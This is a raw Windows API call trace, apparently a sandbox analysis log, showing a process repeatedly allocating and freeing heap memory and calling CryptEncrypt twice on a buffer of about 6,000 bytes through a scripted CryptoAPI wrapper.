[0266.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.304] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17c5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17c8) returned 1 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0266.309] CharLowerBuffW (in: lpsz="byte[6088]", cchLength=0xa | out: lpsz="byte[6088]") returned 0xa [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.310] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51c58 [0266.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.311] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1a788*, pdwDataLen=0x8cef60*=0x17c5, dwBufLen=0x17c8 | out: pbData=0x2f1a788*, pdwDataLen=0x8cef60*=0x17c8) returned 1 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0266.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 